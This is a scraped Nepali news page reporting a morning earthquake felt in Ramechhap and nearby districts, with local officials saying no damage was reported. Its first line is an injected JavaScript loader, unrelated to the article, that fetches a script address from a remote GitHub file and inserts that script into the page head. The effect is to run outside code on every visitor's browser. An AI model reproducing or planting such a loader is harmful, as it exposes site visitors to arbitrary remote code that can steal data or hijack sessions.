;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ ३१,
काठमाडौं । रामेछापकी प्रमुख जिल्ला अधिकारी रुद्रादेवी शर्माले कोरोना भाइरस संक्रमणको महामारीमा अर्को बिपत्ति आएको भन्दै जिल्ला वासिहरुलाई सुरक्षित रुपमा रहन आग्रह हरेकी छन् । (बुधबार) बिहान ५:१९ मिनेटमा ६ रेक्टर स्किलकाे भुकम्प गए लगत्तै जुनली न्यूजसंग संक्षिप्त कुरा गर्दै उनले सबै जिल्ला बासिहरुलाई सचेत गराएकी हुन् । ६ : ३० बजेसम्ममा उनलाई जिल्लामा कुनै दुर्घटना भएको खबर नआएको बताउदै भुकम्पको झड्काले आफूसहित सबैलाई त्रसित् बनाएको बताउदै सबैलाई सचेत भएर बस्न आग्रह गरिन् ।
बुधबार एकाबिहानै सिन्धुपाल्चोक राम्चेलाई केन्द्र बिन्दु बनाएर भुकम्प गएको राष्ट्रिय भुकम्प मापन केन्द्रले जनाएको छ । भुकम्पको धक्का रामेछाप, सिन्धुली, दोलखा, ओखलढुङ्गालगाएतका जिल्लामा महसुस् भएको थियो । मानिसहरु भुकम्प गएको थाहा पाएर बाहिर निस्किएका थिए ।
त्यस्तै जिल्ला प्रहरी कार्यालय रामेछापका प्रमुख प्रहरी नायक उपरिक्षक (डिएसपी) बसन्त पाठकले पनि आफूहरुलाई हालसम्ममा कुनै दुर्घटनाको खबर नआएको उल्लेख गरे । बसै गाउँपालिका प्रमुख र सम्बन्धित् निकायसंग कुरा गरेको बताउदै हालसम्ममा सुरक्षित भएको बताए ।
फेसबुक प्रतिक्रियाहरु